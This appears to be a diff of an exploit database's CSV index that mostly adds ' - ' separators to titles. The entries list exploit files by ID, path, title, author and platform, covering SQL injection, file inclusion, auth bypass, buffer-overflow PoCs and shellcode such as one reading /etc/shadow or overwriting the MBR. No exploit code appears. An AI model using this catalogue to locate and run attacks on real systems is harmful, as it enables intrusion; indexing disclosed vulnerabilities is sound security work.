11851,platforms/php/webapps/11851.txt,"Joomla Component Property - Local File Inclusion",2010-03-23,"Chip d3 bi0s",php,webapps,0 -11852,platforms/php/webapps/11852.txt,"Xataface Admin Auth Bypass",2010-03-23,Xinapse,php,webapps,0 +11852,platforms/php/webapps/11852.txt,"Xataface - Admin Auth Bypass",2010-03-23,Xinapse,php,webapps,0 11853,platforms/php/webapps/11853.txt,"Joomla Component SMEStorage - Local File Inclusion",2010-03-23,"Chip d3 bi0s",php,webapps,0 11855,platforms/multiple/dos/11855.c,"Jinais IRC Server 0.1.8 - NULL Pointer PoC",2010-03-23,"Salvatore Fresta",multiple,dos,0 11856,platforms/multiple/remote/11856.txt,"uhttp Server Path Traversal",2010-03-23,"Salvatore Fresta",multiple,remote,0 @@ -10862,7 +10862,7 @@ id,file,description,date,author,platform,type,port 11883,platforms/php/webapps/11883.txt,"WebSiteBaker 2.8.1 DataBase Backup Disclosure",2010-03-25,Tr0y-x,php,webapps,0 11884,platforms/php/webapps/11884.txt,"Joomla Component dcsFlashGames 2.0RC1 - SQL Injection (catid)",2010-03-26,kaMtiEz,php,webapps,0 11885,platforms/php/webapps/11885.txt,"Flirt Matching Sms System SQL Injection Exploit",2010-03-26,"Easy Laster",php,webapps,0 -11886,platforms/windows/remote/11886.py,"SAP MaxDB Malformed Handshake Request Remote Code Execution",2010-03-26,"S2 Crew",windows,remote,0 +11886,platforms/windows/remote/11886.py,"SAP MaxDB - Malformed Handshake Request Remote Code Execution",2010-03-26,"S2 Crew",windows,remote,0 11888,platforms/php/webapps/11888.txt,"DaFun Spirit 2.2.5 - Multiple Remote File Inclusion",2010-03-26,2010-03-26,php,webapps,0 11889,platforms/php/webapps/11889.txt,"leaftec CMS - Multiple vulnerabilities",2010-03-26,Valentin,php,webapps,0 11890,platforms/ios/dos/11890.txt,"iOS Safari - Bad 'VML' Remote DoS",2010-03-26,"Nishant Das Patnaik",ios,dos,0 @@ -10928,14 +10928,14 @@ id,file,description,date,author,platform,type,port 11963,platforms/php/webapps/11963.txt,"Huron CMS 8 11 2007 - (Auth Bypass) SQL Injection",2010-03-30,mat,php,webapps,0 11964,platforms/multiple/webapps/11964.pl,"Easy-Clanpage 2.1 - SQL Injection Exploit",2010-03-30,"Easy Laster",multiple,webapps,0 11965,platforms/php/webapps/11965.txt,"kora Reinstall Admin Information",2010-03-30,indoushka,php,webapps,0 -11966,platforms/windows/dos/11966.py,"Easy Icon Maker .ico File Reading Crash",2010-03-30,ITSecTeam,windows,dos,0 +11966,platforms/windows/dos/11966.py,"Easy Icon Maker - .ico File Reading Crash",2010-03-30,ITSecTeam,windows,dos,0 11967,platforms/php/webapps/11967.txt,"Snipe Photo Gallery - Bypass Remote Upload",2010-03-30,indoushka,php,webapps,0 11968,platforms/php/webapps/11968.txt,"Hosting-php-dynamic - Auth Bypass",2010-03-30,indoushka,php,webapps,0 11973,platforms/windows/remote/11973.txt,"CompleteFTP Server Directory Traversal",2010-03-30,zombiefx,windows,remote,0 11974,platforms/windows/remote/11974.py,"HP OpenView NNM - OvWebHelp.exe CGI Topic Overflow",2010-03-30,"S2 Crew",windows,remote,0 11975,platforms/windows/dos/11975.rb,"Free MP3 CD Ripper 2.6 - (0Day) (1)",2010-03-30,"Richard leahy",windows,dos,0 11976,platforms/windows/local/11976.php,"Free MP3 CD Ripper 2.6 - (wav) 1day Stack Buffer Overflow PoC Exploit",2010-03-31,mr_me,windows,local,0 -11977,platforms/windows/dos/11977.pl,"CDTrustee .BAK Local Crash PoC",2010-03-31,anonymous,windows,dos,0 +11977,platforms/windows/dos/11977.pl,"CDTrustee - .BAK Local Crash PoC",2010-03-31,anonymous,windows,dos,0 11978,platforms/php/webapps/11978.txt,"Joomla Component DW Graph - Local File Inclusion",2010-03-31,"Chip d3 bi0s",php,webapps,0 11979,platforms/php/webapps/11979.pl,"Centreon IT & Network Monitoring 2.1.5 - SQL Injection",2010-03-31,"Jonathan Salwan",php,webapps,0 11980,platforms/php/webapps/11980.txt,"Easy-Clanpage 2.2 - Multiple SQL Injection / Exploit",2010-03-31,"Easy Laster",php,webapps,0 @@ -10983,7 +10983,7 @@ id,file,description,date,author,platform,type,port 12029,platforms/asp/webapps/12029.txt,"SafeSHOP 1.5.6 - Cross-Site Scripting / Multiple Cross-Site Request Forgery",2010-04-03,"cp77fk4r ",asp,webapps,0 12030,platforms/windows/dos/12030.html,"IncrediMail 2.0 - ActiveX (Authenticate) bof PoC",2010-04-03,d3b4g,windows,dos,0 12031,platforms/php/webapps/12031.html,"Advanced Management For Services Sites - Remote Add Admin Exploit",2010-04-03,alnjm33,php,webapps,0 -12032,platforms/windows/dos/12032.html,"Microsoft Internet Explorer Tabular Data Control ActiveX Remote Code Execution",2010-04-03,ZSploit.com,windows,dos,0 +12032,platforms/windows/dos/12032.html,"Microsoft Internet Explorer Tabular Data Control - ActiveX Remote Code Execution",2010-04-03,ZSploit.com,windows,dos,0 12033,platforms/multiple/remote/12033.txt,"Java Mini Web Server 1.0 - Path Traversal / Cross-Site Scripting",2010-04-03,"cp77fk4r ",multiple,remote,0 12034,platforms/php/webapps/12034.txt,"flatpress 0.909.1 - Stored XSS",2010-04-03,ITSecTeam,php,webapps,0 12035,platforms/windows/local/12035.pl,"ZipScan 2.2c SEH",2010-04-03,"Lincoln and corelanc0d3r",windows,local,0 @@ -11067,7 +11067,7 @@ id,file,description,date,author,platform,type,port 12119,platforms/windows/remote/12119.pl,"Windows FTP Server 1.4 - Auth Bypass",2010-04-09,chap0,windows,remote,0 12120,platforms/php/webapps/12120.txt,"Joomla Component Foobla Suggestions com_foobla - Local File Inclusion",2010-04-09,"Chip d3 bi0s",php,webapps,0 12121,platforms/php/webapps/12121.txt,"Joomla Component JA Voice com_javoice - LFI",2010-04-09,kaMtiEz,php,webapps,0 -12122,platforms/multiple/remote/12122.txt,"JAVA Web Start Arbitrary command-line injection",2010-04-09,"Ruben Santamarta ",multiple,remote,0 +12122,platforms/multiple/remote/12122.txt,"JAVA Web Start - Arbitrary command-line injection",2010-04-09,"Ruben Santamarta ",multiple,remote,0 12123,platforms/php/webapps/12123.txt,"Joomla Component com_pcchess - Local File Inclusion",2010-04-09,team_elite,php,webapps,0 12124,platforms/php/webapps/12124.txt,"Joomla Component huruhelpdesk - SQL Injection",2010-04-09,bumble_be,php,webapps,0 12128,platforms/php/webapps/12128.txt,"GarageSales - Remote Upload",2010-04-09,saidinh0,php,webapps,0 @@ -11081,7 +11081,7 @@ id,file,description,date,author,platform,type,port 12137,platforms/php/webapps/12137.txt,"joomla component allvideos - Blind SQL Injection",2010-04-10,bumble_be,php,webapps,0 12138,platforms/php/webapps/12138.txt,"Joomla Com_Ca - SQL Injection",2010-04-10,DigitALL,php,webapps,0 12139,platforms/php/webapps/12139.txt,"Kiasabz Article News CMS Magazine SQL Injection",2010-04-10,indoushka,php,webapps,0 -12140,platforms/php/webapps/12140.php,"xBtiTracker SQL Injection",2010-04-11,InATeam,php,webapps,0 +12140,platforms/php/webapps/12140.php,"xBtiTracker - SQL Injection",2010-04-11,InATeam,php,webapps,0 12141,platforms/php/webapps/12141.txt,"MediaInSpot CMS LFI",2010-04-11,"Amoo Arash",php,webapps,0 12142,platforms/php/webapps/12142.txt,"Joomla Component TweetLA! - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0 12143,platforms/php/webapps/12143.txt,"Joomla Component Ticketbook - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0 @@ -11138,8 +11138,8 @@ id,file,description,date,author,platform,type,port 12194,platforms/php/webapps/12194.txt,"Police Municipale Open Main Courante 1.01beta - (RFI/LFI) Multiple File Include",2010-04-13,"cr4wl3r ",php,webapps,0 12195,platforms/php/webapps/12195.rb,"joelz bulletin board 0.9.9rc3 - Multiple SQL Injection",2010-04-13,"Easy Laster",php,webapps,0 12197,platforms/asp/webapps/12197.txt,"Mp3 MuZik Data Base Download",2010-04-13,indoushka,asp,webapps,0 -12198,platforms/php/webapps/12198.txt,"Games Script (Galore) Backup Dump",2010-04-13,indoushka,php,webapps,0 -12199,platforms/asp/webapps/12199.txt,"My School Script Data Base Download",2010-04-13,indoushka,asp,webapps,0 +12198,platforms/php/webapps/12198.txt,"Games Script - (Galore) Backup Dump",2010-04-13,indoushka,php,webapps,0 +12199,platforms/asp/webapps/12199.txt,"My School Script - Data Base Download",2010-04-13,indoushka,asp,webapps,0 12200,platforms/php/webapps/12200.txt,"Joomla Component QPersonel - SQL Injection",2010-04-13,Valentin,php,webapps,0 12201,platforms/windows/dos/12201.html,"MagnetoSoft DNS 4.0.0.9 - ActiveX DNSLookupHostWithServer PoC",2010-04-13,s4squatch,windows,dos,0 12202,platforms/windows/remote/12202.html,"MagnetoSoft ICMP 4.0.0.18 - ActiveX AddDestinationEntry BOF",2010-04-13,s4squatch,windows,remote,0 @@ -11148,7 +11148,7 @@ id,file,description,date,author,platform,type,port 12205,platforms/windows/dos/12205.html,"MagnetoSoft NetworkResources 4.0.0.5 - ActiveX NetSessionDel PoC",2010-04-13,s4squatch,windows,dos,0 12206,platforms/windows/dos/12206.html,"MagnetoSoft NetworkResources 4.0.0.5 - ActiveX NetFileClose SEH Overwrite PoC",2010-04-13,s4squatch,windows,dos,0 12207,platforms/windows/dos/12207.html,"MagnetoSoft NetworkResources 4.0.0.5 - ActiveX NetShareEnum SEH Overwrite PoC",2010-04-13,s4squatch,windows,dos,0 -12208,platforms/windows/dos/12208.html,"MagnetoSoft NetworkResources ActiveX NetConnectionEnum SEH Overwrite PoC",2010-04-13,s4squatch,windows,dos,0 +12208,platforms/windows/dos/12208.html,"MagnetoSoft NetworkResources - ActiveX NetConnectionEnum SEH Overwrite PoC",2010-04-13,s4squatch,windows,dos,0 12212,platforms/php/webapps/12212.txt,"Opentel Openmairie tel 1.02 - Local File Inclusion",2010-04-14,"cr4wl3r ",php,webapps,0 12213,platforms/windows/local/12213.c,"Micropoint Proactive Denfense Mp110013.sys 1.3.10123.0 - Local Privilege Escalation Exploit",2010-04-14,MJ0011,windows,local,0 12217,platforms/multiple/dos/12217.py,"Remote Exploit Against the Aircrack-NG Tools svn r1675",2010-04-14,"Lukas Lueg",multiple,dos,0 @@ -11160,7 +11160,7 @@ id,file,description,date,author,platform,type,port 12223,platforms/php/webapps/12223.txt,"Multi-Mirror Remote Upload",2010-04-14,indoushka,php,webapps,0 12224,platforms/php/webapps/12224.txt,"Mihalism Multi Host 4.0.0 - Upload",2010-04-14,indoushka,php,webapps,0 12226,platforms/php/webapps/12226.txt,"Magic Uploader Mini Upload",2010-04-14,indoushka,php,webapps,0 -12227,platforms/php/webapps/12227.txt,"YUI Images Script Shell Upload",2010-04-14,Mr.P3rfekT,php,webapps,0 +12227,platforms/php/webapps/12227.txt,"YUI Images Script - Shell Upload",2010-04-14,Mr.P3rfekT,php,webapps,0 12228,platforms/windows/dos/12228.py,"MovieLibrary 1.4.401 - Local DoS (.dmv)",2010-04-14,anonymous,windows,dos,0 12229,platforms/windows/dos/12229.py,"Book Library 1.4.162 - Local DoS (.bkd)",2010-04-14,anonymous,windows,dos,0 12230,platforms/php/webapps/12230.txt,"Joomla Component wgPicasa com_wgpicasa - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0 @@ -11174,13 +11174,13 @@ id,file,description,date,author,platform,type,port 12238,platforms/php/webapps/12238.txt,"Joomla Component Deluxe Blog Factory com_blogfactory - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0 12239,platforms/php/webapps/12239.txt,"Joomla Component BeeHeard Lite com_beeheard - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0 12240,platforms/windows/dos/12240.py,"Mocha LPD 1.9 - Remote Buffer Overflow DoS PoC",2010-04-14,mr_me,windows,dos,0 -15732,platforms/linux/dos/15732.txt,"FontForge .BDF Font File Stack-Based Buffer Overflow",2010-12-14,"Ulrik Persson",linux,dos,0 +15732,platforms/linux/dos/15732.txt,"FontForge - .BDF Font File Stack-Based Buffer Overflow",2010-12-14,"Ulrik Persson",linux,dos,0 12241,platforms/php/webapps/12241.txt,"Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities",2010-04-14,eidelweiss,php,webapps,0 12242,platforms/jsp/webapps/12242.txt,"RJ-iTop Network Vulnerability Scanner System - Multiple SQL Injections",2010-04-14,wsn1983,jsp,webapps,0 12243,platforms/windows/dos/12243.py,"RPM Select/Elite 5.0 - (.xml config parsing) Unicode Buffer Overflow PoC",2010-04-14,mr_me,windows,dos,0 12244,platforms/windows/remote/12244.txt,"iMesh 7.1.0.x - (IMWeb.dll 7.0.0.x) Remote Heap Overflow Exploit",2007-12-18,rgod,windows,remote,0 -20109,platforms/windows/local/20109.rb,"Photodex ProShow Producer 5.0.3256 load File Handling Buffer Overflow",2012-07-27,Metasploit,windows,local,0 -12245,platforms/php/webapps/12245.txt,"Softbiz B2B trading Marketplace Script buyers_subcategories SQL Injection",2010-04-15,"AnGrY BoY",php,webapps,0 +20109,platforms/windows/local/20109.rb,"Photodex ProShow Producer 5.0.3256 - load File Handling Buffer Overflow",2012-07-27,Metasploit,windows,local,0 +12245,platforms/php/webapps/12245.txt,"Softbiz B2B trading Marketplace Script - buyers_subcategories SQL Injection",2010-04-15,"AnGrY BoY",php,webapps,0 12246,platforms/php/webapps/12246.txt,"joomla component com_iproperty 1.5.3 - (id) SQL Injection",2010-04-15,v3n0m,php,webapps,0 12247,platforms/windows/remote/12247.html,"Magneto Net Resource ActiveX 4.0.0.5 - NetFileClose Exploit (Universal)",2010-04-15,dookie,windows,remote,0 12248,platforms/windows/remote/12248.html,"Magneto Net Resource ActiveX 4.0.0.5 - NetConnectionEnum Exploit (Universal)",2010-04-15,dookie,windows,remote,0 @@ -11190,7 +11190,7 @@ id,file,description,date,author,platform,type,port 12252,platforms/hardware/dos/12252.txt,"IBM BladeCenter Management Module - DoS",2010-04-15,"Alexey Sintsov",hardware,dos,0 12254,platforms/php/webapps/12254.txt,"FCKEditor Core - (FileManager test.html) Remote Arbitrary File Upload Exploit",2010-04-16,Mr.MLL,php,webapps,0 12255,platforms/windows/local/12255.rb,"Winamp 5.572 - whatsnew.txt SEH (Metasploit)",2010-04-16,blake,windows,local,0 -12256,platforms/php/webapps/12256.txt,"ilchClan 1.0.5B SQL Injection Exploit",2010-04-16,"Easy Laster",php,webapps,0 +12256,platforms/php/webapps/12256.txt,"ilchClan 1.0.5B - SQL Injection Exploit",2010-04-16,"Easy Laster",php,webapps,0 12257,platforms/php/webapps/12257.txt,"joomla component com_manager 1.5.3 - (id) SQL Injection",2010-04-16,"Islam DefenDers Mr.HaMaDa",php,webapps,0 12258,platforms/windows/dos/12258.py,"Windows - SMB Client-Side Bug Proof of Concept (MS10-006)",2010-04-16,"laurent gaffie",windows,dos,0 12259,platforms/php/dos/12259.php,"PHP 5.3.x - DoS",2010-04-16,ITSecTeam,php,dos,0 @@ -11323,7 +11323,7 @@ id,file,description,date,author,platform,type,port 12412,platforms/php/webapps/12412.txt,"Ramaas Software CMS - SQL Injection",2010-04-27,41.w4r10r,php,webapps,0 12413,platforms/php/webapps/12413.txt,"i-Net Online Community XSS and Authentication Bypass",2010-04-27,Sid3^effects,php,webapps,0 12414,platforms/php/webapps/12414.txt,"2DayBiz Auction Script - Authentication Bypass",2010-04-27,Sid3^effects,php,webapps,0 -12415,platforms/php/webapps/12415.txt,"Infocus Real Estate Enterprise Edition Script Authentication Bypass",2010-04-27,Sid3^effects,php,webapps,0 +12415,platforms/php/webapps/12415.txt,"Infocus Real Estate Enterprise Edition Script - Authentication Bypass",2010-04-27,Sid3^effects,php,webapps,0 12416,platforms/php/webapps/12416.txt,"PHP Quick Arcade 3.0.21 - Multiple Vulnerabilites",2010-04-27,ITSecTeam,php,webapps,0 12417,platforms/windows/remote/12417.py,"Bigant Messenger 2.52 - (AntCore.dll) RegisterCom() Remote Heap Overflow (0Day)",2010-04-27,mr_me,windows,remote,0 12419,platforms/php/webapps/12419.txt,"Boutique SudBox 1.2 - Changer Login et Mot de Passe CSRF",2010-04-27,indoushka,php,webapps,0 @@ -11338,7 +11338,7 @@ id,file,description,date,author,platform,type,port 12428,platforms/php/webapps/12428.txt,"Joomla Component SmartSite com_smartsite - Local File Inclusion",2010-04-27,AntiSecurity,php,webapps,0 12429,platforms/php/webapps/12429.pl,"Joomla ABC Extension com_abc - SQL Injection Exploit",2010-04-27,AntiSecurity,php,webapps,0 12430,platforms/php/webapps/12430.txt,"Joomla Component graphics (com_graphics) 1.0.6 - LFI",2010-04-27,"wishnusakti + inc0mp13te",php,webapps,0 -12431,platforms/windows/dos/12431.html,"Webmoney Advisor ActiveX Remote Denial of Service",2010-04-28,Go0o$E,windows,dos,0 +12431,platforms/windows/dos/12431.html,"Webmoney Advisor - ActiveX Remote Denial of Service",2010-04-28,Go0o$E,windows,dos,0 12432,platforms/php/webapps/12432.txt,"Joomla JE Property Finder Component - Upload",2010-04-28,Sid3^effects,php,webapps,0 12433,platforms/cgi/webapps/12433.py,"NIBE heat pump RCE Exploit",2010-04-28,"Jelmer de Hen",cgi,webapps,0 12434,platforms/cgi/webapps/12434.py,"NIBE heat pump LFI Exploit",2010-04-28,"Jelmer de Hen",cgi,webapps,0 @@ -11408,7 +11408,7 @@ id,file,description,date,author,platform,type,port 12500,platforms/php/webapps/12500.txt,"Clicksor SQL Injecti0n",2010-05-04,JM511,php,webapps,0 12501,platforms/windows/local/12501.php,"Beyond Compare 3.0.13 b9599 - (.zip) Stack Buffer Overflow PoC Exploit (0Day)",2010-05-04,mr_me,windows,local,0 12504,platforms/php/webapps/12504.txt,"thEngine 0.1 - LFI",2010-05-04,team_elite,php,webapps,0 -12506,platforms/php/webapps/12506.php,"Knowledgeroot (fckeditor) Remote Arbitrary File Upload Exploit",2010-05-04,eidelweiss,php,webapps,0 +12506,platforms/php/webapps/12506.php,"Knowledgeroot (fckeditor) Remote - Arbitrary File Upload Exploit",2010-05-04,eidelweiss,php,webapps,0 12507,platforms/php/webapps/12507.txt,"SmartCMS 2 - SQL Injection",2010-05-04,Ariko-Security,php,webapps,0 12508,platforms/osx/dos/12508.html,"history.go() DoS on Multiple browsers",2010-05-04,Dr_IDE,osx,dos,0 12509,platforms/osx/dos/12509.html,"window.print() DoS on Multiple browsers",2010-05-04,Dr_IDE,osx,dos,0 @@ -11574,12 +11574,12 @@ id,file,description,date,author,platform,type,port 12680,platforms/windows/webapps/12680.txt,"3Com* iMC (Intelligent Management Center) - XSS / Information Disclosure Flaws",2010-05-21,"Richard Brain",windows,webapps,0 12683,platforms/windows/dos/12683.pl,"Solarwinds 10.4.0.10 - TFTP DoS",2010-05-21,Nullthreat,windows,dos,69 12684,platforms/php/webapps/12684.txt,"ConPresso 4.0.7 - SQL Injection",2010-05-21,Gamoscu,php,webapps,0 -12686,platforms/php/webapps/12686.txt,"Online University (Auth Bypass) SQL Injection",2010-05-21,"cr4wl3r ",php,webapps,0 +12686,platforms/php/webapps/12686.txt,"Online University - (Auth Bypass) SQL Injection",2010-05-21,"cr4wl3r ",php,webapps,0 12687,platforms/windows/dos/12687.pl,"WinDirectAudio 1.0 - (.WAV) PoC",2010-05-21,ahwak2000,windows,dos,0 12688,platforms/php/webapps/12688.txt,"JV2 Folder Gallery 3.1 - (gallery.php) Remote File Inclusion",2010-05-21,"Sn!pEr.S!Te Hacker",php,webapps,0 12689,platforms/multiple/webapps/12689.txt,"Apache Axis2 administration console - (Authenticated) Cross-Site Scripting",2010-05-21,"Richard Brain",multiple,webapps,0 12690,platforms/php/webapps/12690.php,"cardinalCMS 1.2 - (fckeditor) Arbitrary File Upload Exploit",2010-05-21,Ma3sTr0-Dz,php,webapps,0 -12691,platforms/php/webapps/12691.txt,"Online Job Board (Auth Bypass) SQL Injection",2010-05-21,"cr4wl3r ",php,webapps,0 +12691,platforms/php/webapps/12691.txt,"Online Job Board - (Auth Bypass) SQL Injection",2010-05-21,"cr4wl3r ",php,webapps,0 14322,platforms/php/webapps/14322.txt,"Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities",2010-07-10,"L0rd CrusAd3r",php,webapps,0 12692,platforms/php/webapps/12692.txt,"TinyBrowser Remote File upload",2010-05-22,Ra3cH,php,webapps,0 12693,platforms/asp/webapps/12693.txt,"Asset Manager Remote File upload",2010-05-22,Ra3cH,asp,webapps,0 @@ -11644,7 +11644,7 @@ id,file,description,date,author,platform,type,port 12766,platforms/php/webapps/12766.txt,"PPhlogger 2.2.5 - (trace.php) Remote Command Execution",2010-05-27,"Sn!pEr.S!Te Hacker",php,webapps,0 12767,platforms/php/webapps/12767.txt,"parlic Design - (SQL/XSS/HTML) Multiple Vulnerabilities",2010-05-27,XroGuE,php,webapps,0 14321,platforms/windows/remote/14321.html,"Image22 ActiveX 1.1.1 - Buffer Overflow Exploit",2010-07-10,blake,windows,remote,0 -12768,platforms/php/webapps/12768.txt,"Hampshire Trading Standards Script SQL Injection",2010-05-27,Mr.P3rfekT,php,webapps,0 +12768,platforms/php/webapps/12768.txt,"Hampshire Trading Standards Script - SQL Injection",2010-05-27,Mr.P3rfekT,php,webapps,0 12769,platforms/php/webapps/12769.txt,"Joomla Component MediQnA 1.1 - LFI",2010-05-27,kaMtiEz,php,webapps,0 12770,platforms/php/webapps/12770.txt,"toronja CMS - SQL Injection",2010-05-27,cyberlog,php,webapps,0 12771,platforms/php/webapps/12771.txt,"Toronja CMS HTML/XSS Injection",2010-05-27,CoBRa_21,php,webapps,0 @@ -11675,7 +11675,7 @@ id,file,description,date,author,platform,type,port 12804,platforms/multiple/remote/12804.txt,"nginx http server 0.6.36 - Path Draversal",2010-05-30,"cp77fk4r ",multiple,remote,0 12805,platforms/php/webapps/12805.txt,"Zeeways Script - Multiple Vulnerabilities",2010-05-30,XroGuE,php,webapps,0 12806,platforms/php/webapps/12806.txt,"CMScout - (XSS/HTML Injection) Multiple Vulnerabilities",2010-05-30,XroGuE,php,webapps,0 -12807,platforms/php/webapps/12807.txt,"Creato Script SQL Injection",2010-05-30,Mr.P3rfekT,php,webapps,0 +12807,platforms/php/webapps/12807.txt,"Creato Script - SQL Injection",2010-05-30,Mr.P3rfekT,php,webapps,0 12808,platforms/php/webapps/12808.txt,"PTC Site's RCE/XSS",2010-05-30,CrazyMember,php,webapps,0 12809,platforms/php/webapps/12809.txt,"Symphony CMS Local File Inclusion",2010-05-30,AntiSecurity,php,webapps,0 12811,platforms/php/webapps/12811.txt,"Oscommerce Online Merchant 2.2 - Remote File Upload",2010-05-30,MasterGipy,php,webapps,0 @@ -11700,7 +11700,7 @@ id,file,description,date,author,platform,type,port 12843,platforms/php/webapps/12843.txt,"Joomla Component ChronoForms (com_chronocontact) - Blind SQL Injection",2010-06-02,_mlk_,php,webapps,0 12845,platforms/php/webapps/12845.txt,"Vastal I-Tech SQL Injection",2010-06-02,HELLBOY,php,webapps,0 12848,platforms/php/webapps/12848.txt,"SIMM Management System (SMS) Local File Inclusion",2010-06-02,AntiSecurity,php,webapps,0 -12849,platforms/php/webapps/12849.txt,"slogan design Script SQL Injection",2010-06-03,Mr.P3rfekT,php,webapps,0 +12849,platforms/php/webapps/12849.txt,"slogan design Script - SQL Injection",2010-06-03,Mr.P3rfekT,php,webapps,0 12850,platforms/php/webapps/12850.txt,"Member ID The Fish Index PHP SQL Injection",2010-06-03,v4lc0m87,php,webapps,0 12852,platforms/windows/dos/12852.txt,"QtWeb 3.3 - Remote DoS/Crash Exploit",2010-06-03,PoisonCode,windows,dos,0 12853,platforms/windows/dos/12853.py,"Quick 'n Easy FTP Server Lite 3.1 - Exploit",2010-06-03,b0nd,windows,dos,0 @@ -12017,7 +12017,7 @@ id,file,description,date,author,platform,type,port 13550,platforms/lin_x86/shellcode/13550.c,"Linux/x86 - setuid(0) and cat /etc/shadow shellcode (49 bytes)",2009-12-04,ka0x,lin_x86,shellcode,0 13551,platforms/lin_x86/shellcode/13551.c,"Linux/x86 - chmod(/etc/shadow_ 0666) & exit() shellcode (33 bytes)",2009-12-04,ka0x,lin_x86,shellcode,0 13553,platforms/lin_x86/shellcode/13553.c,"Linux/x86 - Linux/x86 execve() shellcode (51 bytes)",2009-12-04,"fl0 fl0w",lin_x86,shellcode,0 -14247,platforms/php/webapps/14247.txt,"Auction_Software Script Admin Login Bypass",2010-07-06,"ALTBTA ",php,webapps,0 +14247,platforms/php/webapps/14247.txt,"Auction_Software Script - Admin Login Bypass",2010-07-06,"ALTBTA ",php,webapps,0 13560,platforms/windows/shellcode/13560.txt,"Windows XP SP2 - PEB ISbeingdebugged shellcode (56 bytes)",2009-12-14,anonymous,windows,shellcode,0 13563,platforms/lin_x86/shellcode/13563.asm,"Linux/x86 - overwrite MBR on /dev/sda with _LOL!' shellcode (43 bytes)",2010-01-15,root@thegibson,lin_x86,shellcode,0 13565,platforms/win_x86/shellcode/13565.asm,"Win32 XP SP3 - ShellExecuteA shellcode",2009-12-19,sinn3r,win_x86,shellcode,0 @@ -12106,7 +12106,7 @@ id,file,description,date,author,platform,type,port 15498,platforms/multiple/dos/15498.html,"Mozilla Firefox 3.6.12 - Remote Denial of Service",2010-11-12,"emgent white_sheep and scox",multiple,dos,0 15499,platforms/windows/local/15499.py,"Free WMA MP3 Converter 1.1 - Buffer Overflow Exploit (SEH)",2010-11-12,Dr_IDE,windows,local,0 13744,platforms/php/webapps/13744.txt,"RTRandomImage Remote File Inclusion",2010-06-06,"Sn!pEr.S!Te Hacker",php,webapps,0 -13745,platforms/php/webapps/13745.txt,"Sphider Script Remote Code Execution",2010-06-06,XroGuE,php,webapps,0 +13745,platforms/php/webapps/13745.txt,"Sphider Script - Remote Code Execution",2010-06-06,XroGuE,php,webapps,0 13746,platforms/php/webapps/13746.txt,"Joomla Component com_searchlog - SQL Injection",2010-06-06,d0lc3,php,webapps,0 13747,platforms/php/webapps/13747.txt,"PHP Car Rental Complete System 1.2 - SQL Injection",2010-06-06,Sid3^effects,php,webapps,0 13748,platforms/php/webapps/13748.txt,"Joomla Component com_annonces - Upload",2010-06-06,Sid3^effects,php,webapps,0 @@ -12124,7 +12124,7 @@ id,file,description,date,author,platform,type,port 13767,platforms/windows/local/13767.c,"SureThing CD Labeler (m3u/pls) - Unicode Stack Overflow PoC Exploit",2010-06-08,mr_me,windows,local,0 13768,platforms/php/local/13768.py,"Castripper 2.50.70 - (.pls) Stack Buffer Overflow DEP bypass Exploit",2010-06-08,mr_me,php,local,0 13769,platforms/php/webapps/13769.txt,"CafeEngine CMS 2.3 - SQLI",2010-06-08,Sid3^effects,php,webapps,0 -13770,platforms/php/webapps/13770.txt,"Hotel / Resort Site Script with OnLine Reservation System",2010-06-08,"L0rd CrusAd3r",php,webapps,0 +13770,platforms/php/webapps/13770.txt,"Hotel / Resort Site Script with OnLine Reservation System - SQL Injection",2010-06-08,"L0rd CrusAd3r",php,webapps,0 13771,platforms/php/webapps/13771.txt,"EMO Realty Manager - SQLi",2010-06-08,"L0rd CrusAd3r",php,webapps,0 13772,platforms/php/webapps/13772.txt,"Rayzz Photoz Upload",2010-06-08,Sid3^effects,php,webapps,0 13773,platforms/php/webapps/13773.txt,"Holiday Travel Portal Upload",2010-06-08,Sid3^effects,php,webapps,0 @@ -12150,7 +12150,7 @@ id,file,description,date,author,platform,type,port 13792,platforms/php/webapps/13792.txt,"Joomla Component cinema - SQL Injection",2010-06-09,Sudden_death,php,webapps,0 13793,platforms/asp/webapps/13793.txt,"Online Notebook Manager - SQLi",2010-06-09,"L0rd CrusAd3r",asp,webapps,0 13794,platforms/multiple/webapps/13794.txt,"Joomla 1.5 Jreservation Component - SQLi / XSS",2010-06-09,Sid3^effects,multiple,webapps,0 -27972,platforms/php/webapps/27972.txt,"ESTsoft InternetDisk Arbitrary File Upload and Script Execution",2006-06-05,Kil13r,php,webapps,0 +27972,platforms/php/webapps/27972.txt,"ESTsoft InternetDisk - Arbitrary File Upload and Script Execution",2006-06-05,Kil13r,php,webapps,0 27973,platforms/php/webapps/27973.txt,"Bookmark4U 2.0 - inc/dbase.php env[include_prefix] Parameter Remote File Inclusion",2006-06-05,SnIpEr_SA,php,webapps,0 27974,platforms/php/webapps/27974.txt,"Bookmark4U 2.0 - inc/config.php env[include_prefix] Parameter Remote File Inclusion",2006-06-05,SnIpEr_SA,php,webapps,0 13796,platforms/php/webapps/13796.txt,"joomla com_jstore - SQLi",2010-06-09,Sid3^effects,php,webapps,0 @@ -12165,11 +12165,11 @@ id,file,description,date,author,platform,type,port 13805,platforms/php/webapps/13805.txt,"PHP Property Rental Script - SQLi / XSS",2010-06-09,"L0rd CrusAd3r",php,webapps,0 13806,platforms/windows/local/13806.txt,"ActivePerl 5.8.8.817 - Buffer Overflow",2010-06-09,PoisonCode,windows,local,0 13807,platforms/php/webapps/13807.py,"BtiTracker 1.3.x < 1.4.x - Exploit",2010-06-09,TinKode,php,webapps,0 -13808,platforms/windows/remote/13808.txt,"Microsoft Windows Help Centre Handles Malformed Escape Sequences Incorrectly",2010-06-10,"Tavis Ormandy",windows,remote,0 +13808,platforms/windows/remote/13808.txt,"Microsoft Windows Help Centre Handles - Malformed Escape Sequences Incorrectly",2010-06-10,"Tavis Ormandy",windows,remote,0 13810,platforms/php/webapps/13810.php,"AWCM CMS - Local File Inclusion",2010-06-10,SwEET-DeViL,php,webapps,0 13812,platforms/php/webapps/13812.txt,"SchoolMation 2.3 - SQLi / XSS",2010-06-10,Sid3^effects,php,webapps,0 13813,platforms/php/webapps/13813.html,"Store Locator Remote Add Admin Exploit CSRF",2010-06-10,JaMbA,php,webapps,0 -13814,platforms/asp/webapps/13814.txt,"Pars Design CMS Arbitrary File Upload",2010-06-10,Securitylab.ir,asp,webapps,0 